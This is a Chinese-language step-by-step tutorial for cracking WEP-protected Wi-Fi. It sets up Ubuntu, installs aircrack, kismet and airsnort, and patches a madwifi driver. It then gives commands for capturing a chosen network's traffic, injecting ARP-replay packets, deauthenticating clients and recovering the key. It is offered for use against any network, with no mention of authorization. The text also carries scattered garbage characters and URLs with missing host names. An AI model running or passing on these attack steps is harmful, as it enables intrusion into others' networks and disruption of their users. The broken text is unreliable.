看了這篇文章��,任何人都可以安裝和運(yùn)行Linux�����,并破解WEP密鑰。我一共花了整整兩天���,并閱讀了大量資料才做出這個(gè)東西����,現(xiàn)在拿出來(lái)和大家分享���。我不是Linux方面的專家�。你所需要的就是一個(gè)有無(wú)線網(wǎng)卡的舊筆記本和一份Ubuntu Linux的拷貝,這是目前最流行并且最易于安裝的Linux發(fā)行版本之一��。
第一步�,很顯然,是安裝Ubuntu����。從CD啟動(dòng),按指示操作�,非常簡(jiǎn)單。要注意的是����,接下來(lái)的每一步都要有序進(jìn)行,否則就達(dá)不到預(yù)期目標(biāo)�。
下一步是安裝其它程序。首先要保證你的本本可以聯(lián)網(wǎng)��。安裝其它程序��,需要打開(kāi)一個(gè)終端窗口���,并鍵入如下代碼:
|
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list |
在編輯器中�,用以下代碼代替其它東西:
| ## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
deb http://archive./ubuntu dapper main restricted universe multiverse
deb-src http://archive./ubuntu dapper main restricted universe multiverse
## MAJOR BUG FIX UPDATES produced after the final release
deb http://archive./ubuntu dapper-updates main restricted universe multiverse
deb-src http://archive./ubuntu dapper-updates main restricted universe multiverse
## UBUNTU SECURITY UPDATES
deb http://security./ubuntu dapper-security main restricted universe multiverse
deb-src http://security./ubuntu dapper-security main restricted universe multiverse
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://archive./ubuntu dapper-backports main restricted universe multiverse
deb-src http://archive./ubuntu dapper-backports main restricted universe multiverse
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
deb http://packages./ubuntu/plf dapper free non-free
deb-src http://packages./ubuntu/plf dapper free non-free |
保存文件、退出編輯器�。敲入如下命令:
現(xiàn)在我們可以安裝后續(xù)將會(huì)用到的包了:
|
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils |
接下來(lái)你應(yīng)該更新整個(gè)系統(tǒng),方法是��,進(jìn)入系統(tǒng)菜單——>Administration——>Update Manager�����。單擊“Check”���,開(kāi)始安裝更新���。然后重啟系統(tǒng)。完成后�,為Madwifi驅(qū)動(dòng)打補(bǔ)丁。
這個(gè)地方可能會(huì)有點(diǎn)復(fù)雜���。我的無(wú)線網(wǎng)卡(Linksys WPC55AG)用的是Atheros驅(qū)動(dòng),我需要對(duì)之打補(bǔ)丁�����。如果你的驅(qū)動(dòng)和我的不同���,你需要研究一下是否需要為驅(qū)動(dòng)打補(bǔ)丁����,是否甚至可以和Aircrack套件協(xié)同工作。Aircrack-ng.org的論壇是一個(gè)用來(lái)測(cè)試的好地方��,當(dāng)然了��,google search也是的�。如果你的網(wǎng)卡也是Atheros的,我們稱之為ath0����,那么,在終端窗口敲入iwconfig�����,會(huì)出現(xiàn)一行字符�����,顯示以太網(wǎng)控制器是Atheros Communications……
我們來(lái)打補(bǔ)丁�。當(dāng)發(fā)現(xiàn)硬盤舊的驅(qū)動(dòng)時(shí),會(huì)暫時(shí)讓你的無(wú)線網(wǎng)卡無(wú)法工作。先進(jìn)入/usr/src目錄�,下載新的驅(qū)動(dòng)、刪掉老驅(qū)動(dòng)�,然后安裝新驅(qū)動(dòng),并打上補(bǔ)丁��。你可以把以下代碼拷貝粘貼到終端:
| sudo -i
cd /usr/src
wget http:///stuff/madwifi-cvs-20051025.tar.gz
wget http:///stuff/madwifi-cvs-20051025.patch
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘a(chǎn)th*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci |
如果你用的是Atheros驅(qū)動(dòng)���,接下來(lái)我們舊需要配置kismet了�����。如果你用的是其它驅(qū)動(dòng)�����,就必須看你所使用的語(yǔ)法����。首先進(jìn)入Kismet配置�,然后改變?cè)创a行。
| sudo gedit /etc/kismet/kismet.conf |
把以“source=”打頭的代碼行變?yōu)椤皊ource=madwifi_ag,ath0,madwifi”�����,重啟計(jì)算機(jī)���。重啟后你將可以通過(guò)無(wú)線網(wǎng)卡訪問(wèn)英特網(wǎng)����。
現(xiàn)在我們開(kāi)始破解���。打開(kāi)一個(gè)終端窗口���,進(jìn)入監(jiān)控模式,運(yùn)行ksimet����。
|
sudo airmon start ath0
sudo kismet |
找到你想要破解的無(wú)線網(wǎng)絡(luò),需要注意其ESSID和通道����,然后敲Ctrl-C退出。
接下來(lái)運(yùn)行airodump�。
| sudo airodump ath0 filename channel# 1 |
文件名隨你意,可以作為ivs文件存在你的home目錄下��,或者存在你運(yùn)行命令的任何目錄下���。
從airodump中拷貝無(wú)線網(wǎng)絡(luò)的bssid�,具體做法是選中后敲Shift+Ctrl+C。打開(kāi)一個(gè)新的終端窗口��,以便我們可以運(yùn)行aireplay��,開(kāi)始注入數(shù)據(jù)包���,導(dǎo)致數(shù)據(jù)量上升���。我們想要airodump中的數(shù)據(jù)欄顯示在10萬(wàn)到40萬(wàn)之間。數(shù)據(jù)包越多�,aircrack就可以越快地找到WEP密鑰。如果WEP密鑰是128位的����,我們可能需要多達(dá)100萬(wàn)個(gè)數(shù)據(jù)包。
| sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0 |
應(yīng)該把網(wǎng)絡(luò)和無(wú)線連接聯(lián)系起來(lái)�����。如果總是超時(shí)����,你需要離無(wú)線路由器更近�,或通過(guò)“sudo iwconfig ath0 rate 1M”改變接口速率����。
接下來(lái)我們想開(kāi)始注入數(shù)據(jù)包�。
| sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0 |
起初只是讀取數(shù)據(jù)包,并且報(bào)告0個(gè)ARP請(qǐng)求�����、發(fā)送0個(gè)數(shù)據(jù)包��。只需要等一兩分鐘�,就會(huì)開(kāi)始大量發(fā)送數(shù)據(jù)包了。如果返回文本�����,并報(bào)告說(shuō)已經(jīng)被削弱了����,那么敲Ctrl+C,重新運(yùn)行命令���?���?梢酝ㄟ^(guò)敲入下面這條命令來(lái)加速任何事情:
| sudo aireplay -0 ath0 -a BSSID ath0 |
否則就只坐等事情慢慢進(jìn)行吧。隨著數(shù)據(jù)包開(kāi)始被發(fā)送���,Airodump中的數(shù)據(jù)欄就開(kāi)始飆升�����。等到收到了預(yù)期數(shù)量的數(shù)據(jù)包���,打開(kāi)一個(gè)新的終端窗口,運(yùn)行aircrack����。
| sudo aircrack filename.ivs |
一分鐘后,aircrack應(yīng)該返回WEP密鑰��。如果沒(méi)有返回���,那就繼續(xù)回收更多的數(shù)據(jù)包�����。
這做起來(lái)一點(diǎn)都不費(fèi)勁�,但可以起作用。
